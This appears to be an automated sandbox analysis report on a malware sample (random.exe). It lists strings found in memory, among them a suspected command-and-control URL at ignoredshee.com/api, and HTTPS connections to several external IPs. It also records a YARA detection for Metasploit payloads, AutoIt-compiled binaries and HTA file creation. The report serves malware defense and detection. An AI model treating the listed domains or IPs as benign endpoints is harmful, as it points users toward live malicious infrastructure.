https://ignoredshee.com/api
Source: random.exe, 00000000.00000003.1758980960.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1806979277.00000000018D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/apiet
Source: random.exe, 00000000.00000003.1699159124.00000000018BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/apill
Source: random.exe, 00000000.00000003.1807175860.0000000001948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/apis.
Source: random.exe, 00000000.00000003.1745108911.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744946033.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1746883697.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744565809.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1745802556.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1727931221.0000000001948000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744719046.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1762606937.0000000001948000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744296256.0000000001948000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744829290.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1744778543.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1745724854.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1758904266.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1746107353.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1745605640.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1747388340.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1769022616.0000000001947000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1747125925.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1746456827.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1747450784.0000000001949000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1747500528.0000000001949000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/apisH
Source: random.exe, 00000000.00000003.1769022616.0000000001937000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1848415216.0000000001932000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/apisg
Source: random.exe, 00000000.00000003.1758904266.0000000001935000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/apixH
Source: random.exe, 00000000.00000003.1848910917.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1806979277.00000000018D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/fO
Source: random.exe, 00000000.00000003.1699159124.00000000018EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/pi
Source: random.exe, 00000000.00000003.1806979277.00000000018D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/pinN
Source: random.exe, 00000000.00000003.1758980960.00000000018D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com/te
Source: random.exe, 00000000.00000003.1848910917.00000000018B6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1685214597.00000000018B6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1806979277.00000000018B6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1758980960.00000000018B6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1747879778.00000000018B6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1699159124.00000000018B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com:443/api
Source: random.exe, 00000000.00000003.1848910917.00000000018B6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1806979277.00000000018B6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1758980960.00000000018B6000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1747879778.00000000018B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ignoredshee.com:443/apin.txtPK
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2192886657.000000000BA83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 00000011.00000002.2301752007.0000000005784000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2396659224.0000000006366000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002F.00000002.2511922304.0000000006297000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000048.00000002.2607393831.000001E8AB25B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDD12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 00000009.00000003.1935347945.0000017ACDCC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: random.exe, 00000000.00000003.1701105247.0000000006160000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000003.2138489623.000000000BCCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: random.exe, 00000000.00000003.1729228320.0000000006225000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000003.2138489623.000000000BCCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: random.exe, 00000000.00000003.1701105247.0000000006160000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1713104023.0000000006159000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1713003998.0000000006159000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1701172523.0000000006159000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000003.2013337368.0000000005932000.00000004.00000020.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.0000000000484000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: random.exe, 00000000.00000003.1701172523.0000000006134000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: random.exe, 00000000.00000003.1701105247.0000000006160000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1713104023.0000000006159000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1713003998.0000000006159000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1701172523.0000000006159000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000003.2013337368.0000000005932000.00000004.00000020.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.0000000000484000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: random.exe, 00000000.00000003.1701172523.0000000006134000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.0000000000484000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: random.exe, 00000000.00000003.1729506302.0000000006105000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2192886657.000000000BA83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: random.exe, 00000000.00000003.1684987492.0000000001923000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1685006729.00000000018D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: random.exe, 00000000.00000003.1685387004.0000000001921000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1685006729.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.1685006729.00000000018EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: random.exe, 00000000.00000003.1700254862.000000000614A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1700191024.000000000614D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: random.exe, 00000000.00000003.1729506302.0000000006105000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2187564208.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2192886657.000000000BA83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: random.exe, 00000000.00000003.1700254862.000000000614A000.00000004.00000800.00020000.00000000.sdmp, random.exe, 00000000.00000003.1700191024.000000000614D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.0000000000567000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.0000000000567000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/about/d
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000003.2138489623.000000000BCCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.0000000000567000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.0000000000567000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000003.2138489623.000000000BCCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.0000000000567000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: random.exe, 00000000.00000003.1729228320.0000000006225000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000003.2138489623.000000000BCCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.0000000000567000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.0000000000567000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: random.exe, 00000000.00000003.1729228320.0000000006225000.00000004.00000800.00020000.00000000.sdmp, 4CAJNBDWED5ZLJ2B.exe, 00000002.00000003.2138489623.000000000BCCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: 4CAJNBDWED5ZLJ2B.exe, 00000002.00000002.2185747966.0000000000567000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

Source: unknown	Network traffic detected: HTTP traffic on port 63732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55225
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55472
Source: unknown	Network traffic detected: HTTP traffic on port 55435 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55490 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 55450 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 63752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55479
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55428 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55522
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55490
Source: unknown	Network traffic detected: HTTP traffic on port 63718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55479 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55531
Source: unknown	Network traffic detected: HTTP traffic on port 55522 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55534
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63717
Source: unknown	Network traffic detected: HTTP traffic on port 63738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63718
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55428
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63727
Source: unknown	Network traffic detected: HTTP traffic on port 63745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63729
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55534 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55435
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63736
Source: unknown	Network traffic detected: HTTP traffic on port 63719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63738
Source: unknown	Network traffic detected: HTTP traffic on port 63742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63730
Source: unknown	Network traffic detected: HTTP traffic on port 55531 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63732
Source: unknown	Network traffic detected: HTTP traffic on port 63728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 63734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55472 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55450
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63749
Source: unknown	Network traffic detected: HTTP traffic on port 63743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63743
Source: unknown	Network traffic detected: HTTP traffic on port 63754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 63723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63757
Source: unknown	Network traffic detected: HTTP traffic on port 63740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 63748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63754

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55428 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55435 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55450 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55472 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55479 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55490 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55522 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:55531 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.38.167:443 -> 192.168.2.4:55534 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:63717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:63744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:63745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.75.215.154:443 -> 192.168.2.4:63749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.254:443 -> 192.168.2.4:63752 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000035.00000002.2949636350.000000000A390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Binary is likely a compiled AutoIt script file

Source: a59b997485.exe, 0000000C.00000002.2243050792.0000000000BF2000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_cef2c254-5
Source: a59b997485.exe, 0000000C.00000002.2243050792.0000000000BF2000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_b3679e78-6
Source: a59b997485.exe, 0000002B.00000000.2393858838.0000000000BF2000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_1b17c324-9
Source: a59b997485.exe, 0000002B.00000000.2393858838.0000000000BF2000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ca87ea8c-1

Creates HTA files

Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	File created: C:\Users\user\AppData\Local\Temp\nFfxcGjs5.hta
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Temp\akcRBGtSi.hta
Source: C:\Users\user\AppData\Local\Temp\1071503101\a59b997485.exe	File created: C:\Users\user\AppData\Local\Temp\ID499IQcV.hta
